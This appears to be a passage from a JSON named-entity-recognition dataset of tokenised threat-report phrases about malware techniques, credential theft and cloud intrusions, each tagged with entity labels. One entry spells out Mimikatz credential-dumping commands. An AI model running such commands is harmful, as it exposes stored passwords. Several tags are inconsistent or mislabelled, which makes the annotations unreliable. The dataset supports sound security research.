"tokens": [ "the", "batch", "file" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "The", "batch", "file" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "The", "batch", "script" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "cmd", "/C" ], "ner_tags": [ "B-SamFile", "B-SamFile" ] }, { "tokens": [ "cmd", "/c" ], "ner_tags": [ "B-SamFile", "B-SamFile" ] }, { "tokens": [ "cmd", "/c" ], "ner_tags": [ "B-SamFile", "B-SamFile" ] }, { "tokens": [ "the", "username" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "using", "the", "username" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "username" ], "ner_tags": [ "O" ] }, { "tokens": [ "obtains", "all", "entries", "within", "the", "IPs", "starting", "with", "192.,", "10.,", "and", ".172", "in", "the", "ARP", "cache", "table" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "it", "then", "checks", "the", "amount", "of", "IPs", "found", "in", "the", "ARP", "table" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ARP", "table" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "the", "GPG-encrypted", "files:" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "the", "encrypted", "data" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "the", "encrypted", "strings", "reside", "within", "the", "function" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "data", "stored", "in", "the", "BSS", "section", "is", "encoded" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "encoded", "data", "in", "the", "BSS", "section" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "on", "the", "API", "calls", "QueryPerformanceFrequency", "and", "QueryPerformanceCounter" ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "from", "API", "call", "GetSystemTimeAsFileTime" ], "ner_tags": [ "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "using", "the", "API" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "The", "traffic", "beaconing", "contains", "the", "following", "pattern", "that", "will", "be", "encrypted", "with", "the", "AES", "key", "extracted", "from", "the", "compressed", "blob" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "encrypted", "with", "AES-128", "beacon" ], "ner_tags": [ "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "OS", "version", "and", "system", "type" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "computer", "name" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "computer", "name" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "screenshot" ], "ner_tags": [ "O" ] }, { "tokens": [ "then", "collects", "the", "credentials,", "host", "information,", "files," ], "ner_tags": [ "O", "I-Features", "I-Features", "O", "I-Features", "O", "O" ] }, { "tokens": [ "Syncro", "RMM", "is", "a", "Remote", "Monitoring", "and", "Management", "tool", "used", "to", "control", "and", "manage", "devices", "remotely." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O" ] }, { "tokens": [ "tool", "can", "be", "used", "as", "a", "persistence", "mechanism", "and", "remote", "accessing" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Features", "I-Features", "O", "B-Features", "O" ] }, { "tokens": [ "Syncro", "RMM", "can", "also", "be", "used", "as", "a", "persistence", "mechanism" ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "leverages", "SOCKS5" ], "ner_tags": [ "O", "B-Way" ] }, { "tokens": [ "leverages", "SOCKS5", "proxies", "to", "hide", "malicious", "traffic" ], "ner_tags": [ "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "task", "scheduling" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "it", "proceeds", "with", "scheduled", "task", "creation" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "run", "the", "scheduled", "task", "every", "2", "minutes", "is", "start." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "scheduled", "task" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "creates", "the", "registry", "key" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "creating", "the", "registry", "key" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "These", "words", "are", "used", "to", "build", "the", "registry", "value", "names." ], "ner_tags": [ "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O" ] }, { "tokens": [ "recursively", "removes", "the", "implementation", "of", "Windows", "Defender", "IOfficeAntiVirus", "under", "HKLM:\\SOFTWARE\\Microsoft\\AMSI\\Providers\\{2781761E-28E0-4109-99FE-B9D127C57AFE}." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "enables", "the", "data", "transfer", "with", "URL", "syntax", "for", "protocols", "such", "as", "HTTP/HTTPS" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "runs", "it", "via", "rundll32.exe" ], "ner_tags": [ "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "injects", "itself", "into", "explorer.exe" ], "ner_tags": [ "B-Way", "O", "O", "B-SamFile" ] }, { "tokens": [ "injecting", "itself", "into", "a", "running", "explorer.exe", "process." ], "ner_tags": [ "B-Way", "I-Way", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "injecting", "itself", "into", "a", "running", "explorer.exe", "process" ], "ner_tags": [ "B-Way", "I-Way", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "The", "script", "performs", "process", "injection", "using", "the", "API", "such", "as", "OpenThread", "(to", "create", "a", "handle", "to", "an", "existing", "process),", "VirtualAlloc", "(memory", "allocation", "in", "the", "chosen", "process),", "and", "QueueUserAPC,", "the", "thread", "that", "the", "APC", "(Asynchronous", "Procedure", "Calls)", "is", "queued", "to", "has", "to", "enter", "an", "alertable", "state" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "accessing", "browser", "credentials", "and", "cookies,", "Thunderbird", "and", "Outlook", "profiles" ], "ner_tags": [ "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "malware", "creates", "the", "persistence", "via", "Registry", "Run", "Keys." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-Tool" ] }, { "tokens": [ "creates", "a", "persistence", "via", "Registry", "Run", "Keys", "under", "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "it", "stores", "three", "embedded", "binaries", "within", "the", "unpacked", "payload." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "embedded", "compressed", "binaries" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "compressed", "binary" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "unpacked", "payload" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "The", "binaries", "are", "compressed", "using", "APLib", "compression", "algorithm." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O" ] }, { "tokens": [ "The", "unpacked", "sample", "is", "approximately", "540", "KB" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "unpacked", "sample", "is", "approximately", "540", "KB" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "decompress", "data", "blobs" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "decompress", "them" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "The", "decompression", "function" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "Decrypted", "strings" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "Decompiled", "decryption", "function" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "Decryption", "function", "in", "Python" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "The", "decryption", "function" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "The", "decryption", "function" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "Decryption", "function" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "the", "decryption", "function" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "APLib", "decompression", "function" ], "ner_tags": [ "B-Idus", "O", "O" ] }, { "tokens": [ "decrypts", "them" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "The", "decryption", "function", "is", "shown", "below,", "the", "decryption", "function", "can", "be", "represented", "as", "the", "following", "pseudocode:" ], "ner_tags": [ "O", "B-Features", "I-Features", "O", "O", "O", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "GPG", "decryption", "routine" ], "ner_tags": [ "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "GPG", "decryption" ], "ner_tags": [ "B-SamFile", "B-SecTeam" ] }, { "tokens": [ "wmic" ], "ner_tags": [ "O" ] }, { "tokens": [ "reg.exe", "query" ], "ner_tags": [ "B-SamFile", "O" ] }, { "tokens": [ "that", "pulls", "the", "written", "data", "from", "the", "registry", "under", "HKEY_CURRENT_USER\\Software\\AppDataLow\\Software\\Microsoft\\<registry_value>>" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "the", "Tor", "communication", "capability" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "Configured", "for", "WMI", "persistence" ], "ner_tags": [ "O", "O", "B-Way", "O" ] }, { "tokens": [ "WMI", "Persistence" ], "ner_tags": [ "B-Time", "O" ] }, { "tokens": [ "As", "tasklist", "uses", "WMI", "“under", "the", "hood," ], "ner_tags": [ "O", "O", "O", "B-Way", "B-Way", "O", "O" ] }, { "tokens": [ "the", "malicious", "authentications", "into", "victim", "O365", "tenants", "had", "originated", "from", "within", "the", "victim’s", "own", "network." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "threat", "actor", "was", "making", "authentications", "to", "O365" ], "ner_tags": [ "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "B-Idus" ] }, { "tokens": [ "Log", "in", "to", "O365", "as", "a", "user", "with", "privileged", "access", "to", "cloud", "resources." ], "ner_tags": [ "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "threat", "actor", "succeeded", "in", "authenticating", "into", "victim", "O365", "tenants" ], "ner_tags": [ "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "B-Idus", "O" ] }, { "tokens": [ "This", "threat", "actor", "abused", "access", "to", "accounts", "in", "the", "Cloud", "Solution", "Partner’s", "environment", "with", "legitimate", "delegated", "administrative", "privileges", "to", "then", "gain", "access", "to", "several", "customers’", "O365", "environments" ], "ner_tags": [ "O", "I-HackOrg", "I-HackOrg", "I-Way", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "B-Idus", "O" ] }, { "tokens": [ "the", "threat", "actor", "connected", "to", "the", "victim’s", "O365", "tenant" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "user", "account", "used", "to", "connect", "to", "the", "victim’s", "O365", "tenant" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O" ] }, { "tokens": [ "the", "threat", "actor", "managed", "to", "continue", "to", "access", "the", "victim’s", "cloud", "environment" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "accounts", "that", "were", "used", "to", "authenticate", "to", "the", "cloud." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "the", "threat", "actor", "used", "a", "compromised", "O365", "administrator", "account" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "threat", "actor", "created", "new", "O365", "Service", "Principals", "to", "maintain", "access", "to", "victim’s", "environments" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "The", "threat", "actor", "used", "accounts", "with", "Delegated", "Administrator", "rights", "to", "access", "other", "O365", "tenants" ], "ner_tags": [ "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "threat", "actor", "leveraged", "different", "credentials", "for", "each", "step", "while", "moving", "laterally", "through", "the", "victim’s", "network" ], "ner_tags": [ "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "using", "privileged", "accounts", "and", "then", "accessed", "the", "wiki", "using", "a", "different", "set", "of", "credentials." ], "ner_tags": [ "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "threat", "actor", "began", "attempting", "to", "connect", "into", "the", "environment", "via", "VPN" ], "ner_tags": [ "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "The", "threat", "actor", "attempted", "to", "log", "in", "to", "the", "VPN", "using", "several", "user", "accounts" ], "ner_tags": [ "O", "I-HackOrg", "I-HackOrg", "O", "O", "I-Purp", "I-Purp", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "threat", "actor", "had", "knowledge", "of", "these", "accounts", "and", "used", "them", "on", "the", "correct", "systems" ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "threat", "actor", "connected", "into", "the", "victim’s", "environment", "via", "a", "VPN" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "The", "Threat", "actor", "also", "used", "valid", "accounts", "to", "create", "persistence", "within", "the", "environment" ], "ner_tags": [ "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "I-Purp", "I-Purp", "I-Purp", "O", "O" ] }, { "tokens": [ "to", "establish", "a", "Remote", "Desktop", "Protocol", "(RDP)", "session", "to", "an", "internal", "server" ], "ner_tags": [ "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "establish", "another", "RDP", "session", "to", "a", "different", "internal", "server" ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "threat", "actor", "connected", "via", "RDP", "to", "a", "user’s", "workstation" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "the", "threat", "actor’s", "RDP", "session." ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "threat", "actor", "established", "RDP", "sessions", "to", "internal", "servers" ], "ner_tags": [ "O", "I-HackOrg", "I-HackOrg", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "The", "threat", "actor", "connected", "via", "Remote", "Desktop" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "the", "user", "the", "threat", "actor", "used", "to", "RDP" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "the", "threat", "actor", "connected", "via", "Remote", "Desktop", "to", "a", "Domain", "Controller" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "The", "threat", "actor", "used", "both", "privileged", "and", "non-privileged", "accounts", "for", "RDP", "throughout", "the", "environment,", "depending", "on", "the", "target", "system" ], "ner_tags": [ "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "using", "a", "domain", "service", "account." ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "using", "a", "domain", "administrator’s", "account." ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "threat", "actor", "could", "have", "easily", "used", "a", "second", "domain", "administrator", "account" ], "ner_tags": [ "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "threat", "actor", "accomplished", "this", "by", "using", "administrative", "accounts" ], "ner_tags": [ "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "a", "given", "user", "account", "was", "also", "authenticating", "to", "Active", "Directory", "from", "a", "given", "source", "IP", "address", "two", "years", "prior" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "user", "account", "was", "known", "to", "have", "recently", "been", "abused", "by", "the", "threat", "actor" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-HackOrg", "I-HackOrg" ] }, { "tokens": [ "the", "threat", "actor", "accessing", "the", "wiki", "as", "users", "who", "would", "be", "considered", "“non-privileged”" ], "ner_tags": [ "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "A", "local", "account", "was", "used", "by", "the", "Threat", "Actor" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "to", "connect", "via", "SMB", "to", "targeted", "users,", "and", "then", "copy", "their", "Chrome", "profile", "directories", "as", "well", "as", "data", "protection", "API", "(DPAPI)", "data." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "B-SamFile", "O" ] }, { "tokens": [ "the", "threat", "actor", "connected", "via", "Remote", "Desktop", "to", "a", "Domain", "Controller", "and", "copied", "the", "DSInternals10", "PowerShell", "module", "to", "the", "system." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "the", "threat", "actor", "must", "first", "decrypt", "them" ], "ner_tags": [ "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "they", "decrypted", "the", "cookies", "file", "using", "the", "user’s", "DPAPI", "key." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "decryption", "of", "the", "cookies" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "deleted", "the", "specific", "history", "items", "related", "to", "threat", "actor", "activity" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Attempted", "to", "blend", "in", "with", "a", "file", "name", "that", "matched", "the", "system", "name", "it", "resided", "on" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Attempted", "to", "blend", "in", "with", "a", "file", "name", "that", "matched", "the", "system", "name", "it", "resided", "on" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "With", "the", "binary", "named", "to", "masquerade", "as", "a", "legitimate", "file", "on", "the", "system" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AdFind", "was", "renamed", "to", "masquerade", "as", "a", "legitimate", "Windows", "binary" ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "threat", "actor", "renamed", "their", "utilities", "to", "masquerade", "as", "legitimate", "system", "binaries", "(AdFind", "as", "svchost.exe),", "match", "the", "system’s", "role", "(GoldMax),", "or", "appear", "legitimate", "(TrailBlazer", "as", "an", "apparent", "Adobe", "utility)." ], "ner_tags": [ "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "threat", "actor", "renamed", "their", "systems", "prior", "to", "connecting", "to", "victim’s", "VPNs", "to", "match", "the", "victim’s", "system", "naming", "convention" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Masquerades", "its", "command-and-control", "(C2)", "traffic", "as", "legitimate", "Google", "Notifications", "HTTP", "requests" ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "placed", "in", "a", "hidden", "directory" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "directories", "with", "random", "names", "of", "a", "consistent", "length", "were", "navigated", "to", "by", "the", "same", "user", "that", "ran", "the", "tool." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ListUsers" ], "ner_tags": [ "B-Time" ] }, { "tokens": [ "The", "threat", "actor", "attempted", "to", "remotely", "list", "running", "processes", "on", "systems", "using", "tasklist.exe" ], "ner_tags": [ "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "process", "listing" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "This", "remote", "process", "listing" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "the", "threat", "actor", "was", "running", "tasklist", "remotely", "on", "these", "systems", "specifically", "to", "see", "which", "of", "the", "target", "systems", "was", "running", "Google", "Chrome." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "threat", "actor", "regularly", "interrogated", "other", "systems", "using", "tasklist.exe" ], "ner_tags": [ "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "the", "use", "of", "a", "PowerShell", "script", "to", "execute", "Mimikatz", "in-memory" ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "B-Way", "O" ] }, { "tokens": [ "to", "execute", "the", "Mimikatz", "commands", "‘privilege::debug", "sekurlsa::logonpasswords", "“lsadump::lsa", "/patch”‘", "in-memory" ], "ner_tags": [ "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "script", "executed", "by", "the", "threat", "actor", "was", "heavily", "obfuscated", "and", "encrypted", "the", "output", "using", "AES256." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "used", "a", "heavily", "obfuscated", "PowerShell", "script" ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "I-Way" ] }, { "tokens": [ "enumerating", "current", "directory" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "tries", "to", "enumerate", "the", "current", "directory" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "crawl", "the", "filesystem" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "The", "decrypted", "payload" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "Decrypted", "payload" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "The", "decrypted", "payload" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "try", "to", "decrypt", "it", "using", "the", "RC4", "encryption", "scheme", "with", "the", "key" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "then", "decrypts", "and", "communicates", "to" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "decodes", "the", "embedded", "shellcode" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "the", "encrypted", "payload" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "contain", "encrypted", "C2", "strings" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "encrypted", "payload" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "Embedded", "encrypted", "payload" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "DLL", "has", "an", "encrypted", "payload", "embedded", "in", "it." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "embedded", "DLL" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "side", "loading", "“ffmpeg.dll”." ], "ner_tags": [ "O", "O", "B-SamFile" ] }, { "tokens": [ "that", "have", "Base64", "and", "AES", "encrypted", "C2’s", "appended", "to", "them" ], "ner_tags": [ "O", "O", "B-Way", "O", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "using", "NetWkstaGetInfo()", "API." ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "domain", "name,", "Hostname", "and", "OS", "Version" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "info", "stealer", "also", "collects", "information", "on", "infected", "hosts" ], "ner_tags": [ "O", "I-SamFile", "B-SecTeam", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Manipulates", "registry" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "decrypting", "and", "executing", "the", "shellcode" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "decrypt", "the", "payload" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "The", "decrypted", "payload" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "decrypts", "a", "shellcode" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "performed", "through", "the", "CryptUnprotectData", "API", "function" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "an", "encrypted", "shellcode", "payload." ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "Encrypts", "a", "provided", "payload" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "DLLs", "with", "the", "names", "ualapi.dll", "and", "ncobjapi.dll", "being", "sideloaded" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-SamFile", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "collects", "system", "information", "and", "browser", "history,", "then", "sends", "it", "to", "the", "C2", "server." ], "ner_tags": [ "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "downloads", "an", "infostealer", "and", "starts", "it." ], "ner_tags": [ "I-Features", "I-Features", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "Performs", "payload", "injections", "through", "syscalls", "via", "mapping", "a", "shellcode", "to", "a", "remote", "process", "and", "creating", "a", "remote", "thread." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "driver", "collects", "information", "about", "installed", "AV", "filters" ], "ner_tags": [ "O", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Connects", "to", "a", "given", "host", "via", "a", "socket", "and", "waits", "for", "the", "server", "to", "send", "data." ], "ner_tags": [ "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Manipulates", "(creates,", "lists,", "starts,", "stops", "and", "deletes)", "services." ], "ner_tags": [ "O", "B-Features", "B-Features", "B-Features", "B-Features", "O", "B-Features", "O" ] }, { "tokens": [ "attackers", "placed" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "attackers", "placed" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "administrator", "credentials" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "compromised", "administrative", "[T1078.001]", "accounts" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "user" ], "ner_tags": [ "O" ] }, { "tokens": [ "Access", "to", "valid" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "locate", "high", "value", "assets", "in", "order", "to", "exfiltrate", "data" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", 